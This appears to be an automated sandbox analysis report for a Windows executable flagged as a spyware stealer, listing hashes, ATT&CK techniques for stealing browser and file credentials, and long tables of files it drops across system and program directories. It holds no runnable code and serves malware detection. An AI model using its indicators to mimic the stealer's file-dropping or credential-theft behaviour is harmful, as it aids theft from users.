d03c7eaa57cca7ae045e15aed612843518917fab03c45401a7c2032678e33127

General

Target

04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
Size

27.8MB
MD5

04b7c4af4a989a6de2339a8b6455d832
SHA1

93f90dafe6dd7d7d358232d2dd38e63c3d82c3ae
SHA256

d03c7eaa57cca7ae045e15aed612843518917fab03c45401a7c2032678e33127
SHA512

0aef888893114bfe435c293541bf7c805d1ab5985ac59edc02710176f9b1f05e6eb93b2065315a71390fa38615bb7e4915138f0f45fe798b0917220ac6843b84
SSDEEP

98304:XX77GBfWr1GjrTgtYOXwnS4rVDBGKfYOXwnS4rVWKwF+WIDQm:vGBfWr1gITItXuQm

Score

7^/10

spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in System32 directory 64 IoCs

Processes:

04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\SysWOW64\wextract.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dcomcnfg.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dxdiag.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Fondue.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\InfDefaultInstall.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\iscsicpl.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\PickerHost.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\psr.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\CheckNetIsolation.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\nslookup.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\rasautou.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\TCPSVCS.EXE-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WerFaultSecure.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\charmap.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RMActivate_ssp.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\runonce.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RdpSaUacHelper.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\rrinstaller.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\expand.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fixmapi.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mmgaserver.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WSManHTTPConfig.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mode.com	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\regsvr32.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RMActivate_isv.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\tasklist.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WWAHost.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cleanmgr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\odbcconf.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SearchProtocolHost.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\setupugc.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\setx.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wermgr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\esentutl.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\eventvwr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\GamePanel.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\mountvol.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\choice.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cttune.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\UserAccountBroker.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\cipher.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dplaysvr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\unlodctr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wevtutil.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Com	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\dxdiag.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\ktmutil.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Netplwiz.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RdpSaUacHelper.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\systeminfo.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\AtBroker.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\EaseOfAccessDialog.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\RpcPing.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SystemPropertiesComputerName.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\WerFault.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\wsmprovhost.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\fc.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\hh.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\logagent.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\MRINFO.EXE	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\scrnsave.scr_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

Drops file in Program Files directory 64 IoCs

Processes:

04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

description	ioc	process
File created	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\codecpacks.VP9.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\MicrosoftEdgeComRegisterShellARM64.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\wsgen.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\ScreenSketch.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\javaws.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\plugin-container.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\pingsender.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_proxy.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\notification_helper.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\MicrosoftEdgeUpdate.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\kinit.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-1000-0000000FF1CE}\misc.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Mozilla Firefox\updater.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\pipanel.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\7-Zip\7zG.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\javaw.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\OLicenseHeartbeat.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Google\Chrome\Application\chrome.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\javacpl.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\VideoLAN\VLC\uninstall.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxTsr.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.185.29\MicrosoftEdgeUpdateSetup_X86_1.3.185.29.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\javap.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\servertool.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Solitaire.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\servertool.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_99140\javaws.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\xlicons.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\7-Zip\7zG.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\jjs.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\javadoc.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\orbd.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.29\MicrosoftEdgeUpdateCore.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\jmap.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\sscicons.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jdk-1.8\bin\tnameserv.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Java\jre-1.8\bin\jabswitch.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedgewebview2.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files (x86)\Google\Update\Install\{C1566D4E-90C3-4D8D-8731-8398B4F79F34}\chrome_installer.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\Office16\CLVIEW.EXE	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

Drops file in Windows directory 64 IoCs

Processes:

04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v3.5\MSBuild.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.AddSuggestedFoldersToLibraryDialog_cw5n1h2txyewy\AddSuggestedFoldersToLibraryDialog.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_32\MSBuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\MSBuild.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\wow_helper.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\microsoft.creddialoghost_cw5n1h2txyewy\CredDialogHost.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\CameraBarcodeScannerPreview.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\ServiceModelReg.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.5\EdmGen.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\CHXSmartScreen.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\IEExec.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\assembly\GAC_64\MSBuild\3.5.0.0__b03f5f7f11d50a3a\MSBuild.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\SMConfigInstaller.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.FileExplorer_cw5n1h2txyewy\FileExplorer.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\ComSvcConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\ComSvcConfig.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\AcroRd32.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v3.0\Windows Communication Foundation\WsatConfig.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Installer\$PatchCache$\Managed\68AB67CA7DA73301B744CAF070E41400\15.7.20033\_4bitmapibroker.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe-	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Win32WebViewHost.exe	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\CallingShellApp.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe_	04b7c4af4a989a6de2339a8b6455d832_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 22 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.exe
